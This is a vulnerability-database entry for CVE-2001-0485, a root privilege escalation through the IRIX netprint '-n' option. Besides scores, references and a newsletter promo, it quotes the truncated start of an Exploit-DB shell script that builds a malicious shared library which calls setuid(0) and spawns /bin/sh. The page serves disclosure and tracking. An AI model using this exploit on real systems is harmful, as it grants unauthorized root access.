CVE-2001-0485
published 2001-06-27CVE-2001-0485: Unknown vulnerability in netprint in IRIX 6.2, and possibly other versions, allows local users with lp privileges attacker to execute arbitrary commands via…
PriorityP428high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.16%
63.1th percentile
Unknown vulnerability in netprint in IRIX 6.2, and possibly other versions, allows local users with lp privileges attacker to execute arbitrary commands via the -n option.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sgi | irix | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation
exploitdb·2001-05-08
CVE-2001-0485 IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation
IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation
---
#!/bin/sh
## copyright LAST STAGE OF DELIRIUM jul 2000 poland *://lsd-pl.net/ #
## /usr/lib/print/netprint #
## #
## This code gets released due to another post to the Bugtraq mailing list. #
## For IRIX 6.3 and above this privilage escalation attack can be conducted #
## by local lp users only. #
EXECUTABLE=/usr/lib/print/netprint
LIBRARY=lsd
DIRECTORY=/tmp
cd $DIRECTORY
cat > $LIBRARY.c << 'EOF'
OpenConn(){
printf("copyright LAST STAGE OF DELIRIUM jul 2000 poland //lsd-pl.net/\n");
printf("/usr/lib/print/netprint for irix 5.3 6.2 6.3 6.4 6.5 6.5.11 IP:all\n");
printf("\n");
setreuid(getuid(),0);setuid(0);setgid(0);
execl("/bin/sh","sh",0);
}
CloseConn(){} ListPrinters(){} SendJob(){} CancelJob(
Exploit-DB
IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage
exploitdb·2001-04-26
CVE-2001-0485 IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage
IRIX 5.3/6.x - 'netprint' Arbitrary Shared Library Usage
---
// source: https://www.securityfocus.com/bid/2656/info
The 'netprint' utility shipped with SGI Irix systems is used to send print jobs to print spoolers on remote hosts. It is installed setuid root by default.
At the command line, 'netprint' accepts an option to specify the network type (-n). This option is argumented with a string representing the type. 'netprint' uses this argument to open a shared library.
There is no input validation on this string, and as a result it is possible for attackers to have malicious shared libraries used. Since 'netprint' is setuid root, malicious code contained in attacker supplied shared libraries will be executed with superuser privileges.
It has been reported that only 'lp' can execute '
No writeups or analysis indexed.
ftp://patches.sgi.com/support/free/security/advisories/20010701-01-Phttp://archives.neohapsis.com/archives/bugtraq/2001-04/0475.htmlhttp://archives.neohapsis.com/archives/bugtraq/2001-04/0502.htmlhttp://www.osvdb.org/8571http://www.securityfocus.com/bid/2656https://exchange.xforce.ibmcloud.com/vulnerabilities/6473ftp://patches.sgi.com/support/free/security/advisories/20010701-01-Phttp://archives.neohapsis.com/archives/bugtraq/2001-04/0475.htmlhttp://archives.neohapsis.com/archives/bugtraq/2001-04/0502.htmlhttp://www.osvdb.org/8571http://www.securityfocus.com/bid/2656https://exchange.xforce.ibmcloud.com/vulnerabilities/6473
2001-06-27
Published